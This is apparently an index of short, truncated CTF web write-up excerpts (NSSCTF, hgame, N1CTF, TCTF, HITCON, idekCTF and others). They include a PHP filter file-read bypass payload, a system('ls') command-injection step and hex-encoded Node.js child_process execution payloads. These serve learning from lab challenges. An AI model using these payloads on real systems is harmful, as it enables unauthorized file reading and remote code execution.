NSSCTF Round#8 web
For the last challenge I thought of an unintended solution, hmm~~~ but couldn't get the unintended solution to work.
MyDoor: arbitrary file inclusion, php://filter/read=convert.base64-encode/resource=index.php
Then pass the parameters N[S.S=system("ls");&file= to pop a shell, then find where the flag is hidden.
MyPage: similar to MyDoor; here dirty data is used for the bypass
php://filter/read=convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/ ...
hgame 2023 web
Week 1 / Classic Childhood Game: going through the JS code there is a piece of data
var a = [ "\x59\x55\x64\x6b\x61\x47\x4a\x58\x56\x6a\x64\x61\x62\x46\x5a\x31\x59\x6d\x35\x73\x53\x31\x6c\x59\x57\x6d\x68\x6a\x4d\x6b\x35\x35\x59\x56\x68\x43\x4d\x45\x70\x72\x57\x6a\x46\x69\x62\x54\x55\x31\x56\x46\x52\x43\x4d\x46\x6c\x56\x59\x7a\x42\x69\x56\x31\x59\x35",];
Decoding it with base64 twice gives the flag.
Become A Member
GET / HTTP/1.1
Host: week-1.hgame.lwsec.cn:32174
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Cut ...
N1CTF-junior-2023
https://ctf.junior.nu1l.com/2023.html
Only solved one challenge, orrs (humbling)
template: reproducing it is easy, but I didn't guess that the weak password was root/root
ez_zudit: requires auditing the code to find an EL expression injection
can_u_bypass: executes Oracle SQL statements, RCE has to be achieved
easyjpg is a 0day challenge, similar to HITCON2022 web2pdf
orrs: has a SQL injection vulnerability
However, the challenge requires RCE
Through the SQL injection the following information was obtained (which turned out to be useless):
database: orrs_db
@@secure_file_priv: /var/lib/mysql-files/
@@plugin_dir: /usr/lib/mysql/plugin/
Table names: message_list, reservation_list, schedule_list, system_info, train_list, users
Columns
user: Host,User,Select_priv,Insert_priv,Update ...
TCTF/0CTF2022 3rm1 + 2021 2rm1
[TCTF2022]3rm1
hint 1: https://i.blackhat.com/eu-19/Wednesday/eu-19-An-Far-Sides-Of-Java-Remote-Protocols.pdf page 50
hint 2: https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Spring1.java
The challenge provides two environments, one RMIClient and one RMIServer. The flag is in the client.
Dockerfile -> JDK version 8u201
wp
https://xz.aliyun.com/t/11883#toc-4
Original challenge attachments: https://github.com/waderwu/My-CTF-Challenges/tree/master/0ctf-2022/3rm1
In threermiclient.jar the FactoryInter interface should extend Remote, otherwise this challenge cannot be solved......
But what decompiles out of the GitHub attachment ...
RealWorldCTF 5th
[RWCTF2023]ChatUWU
Saw other people's chat on Discord; each had their own approach:
in my case I just set a breakpoint when the user input entered socket.io and just followed it until I saw that nice parse function
I don't think that fuzzing is needed for such a small codebase, and as @[Sauercloud] WhoNeedsSleep already said we had an intuition that tricking the bot into connecting to our server would be necessary. so this line where the url is just passed to socket.io was a good starting point to look for a potential flaw and it ...
HITCON2022-web
[HITCON2022]RCE: the first step is obtaining the secret
import requests
import urllib
payload = "7265717569726528276368696c645f70726f6365737327292e6578656328276c73202f2729" # require('child_process').exec('ls /')
payload = "7265712e7365637265743d224c316e4c316e4c22" # {"progress":40,"result":"Executing 'req.secret=\"L1nL1nL\"', result = L1nL1nL"}
payload = "7265712e73656372 ...
idekCTF2022-web-wp
Readme: testing the parameters, I found that buf contains pseudorandom numbers
When we pass in 1,2,3 the backend sums them, giving 6
{"orders": [1,2,3]}
But when testing with 100, the backend unexpectedly added 4096
From this piece of code, find the number we need to sum up to: 12625
func justFindIt(w http.ResponseWriter, r *http.Request) {
	count := 0
	for true {
		count++
		reader := bytes.NewReader(randomData)
		validator := NewValidator()
		ctx := context.Background()
		ctx = WithValidatorCtx(ctx, reader, int(count))
		_, err := validator.Read(ctx)
		if err != nil {
		}
		if err : ...
0ctf/TCTF2022-hessian-onlyjdk
[TCTF/0CTF2022]hessian-onlyjdk: for this challenge I looked up a lot of material
https://blog.z3ratu1.cn/0CTF2022%E5%A4%8D%E7%8E%B0.html
https://siebene.github.io/2022/09/19/0CTF2022-hessian-onlyjdk-WriteUp/
http://miku233.viewofthai.link/2022/10/13/0ctf-hessian-onlyjdk/
https://guokeya.github.io/post/psaIZKtC4/
https://www.cnblogs.com/kingbridge/articles/16717030.html#%E7%AE%80%E5%8D%95%E5%88%86%E6%9E%90
https://xz.aliyun.com/t/11732
First, one needs to understand where the XStream CVE-2021-21346 gadget chain comes from: https://x-stream.github.io/CVE-2021-21346.html
Next, learn the Wangding Cup (网鼎杯) hes ... challenge
AXB2022-ezjaba
Mainly just a record; CodeQL is also covered
The challenge provides a JDBC connection. As is well known, connecting to a MySQL database over JDBC carries risks, and this challenge attempts to disable the two risky points of the MySQL connection.
package com.example.ezjaba.security;
/* loaded from: ezjaba.jar:BOOT-INF/classes/com/example/ezjaba/security/JdbcUtils.class */
public class JdbcUtils {
    private static final String JDBC_MYSQL_PROTOCOL = "jdbc:mysql";
    private static final String SENSITIVE_PARAM = "autoDeserialize=true"; // disable deserialization
    private static final String FILE_READ = "allowL ...
Java-0x01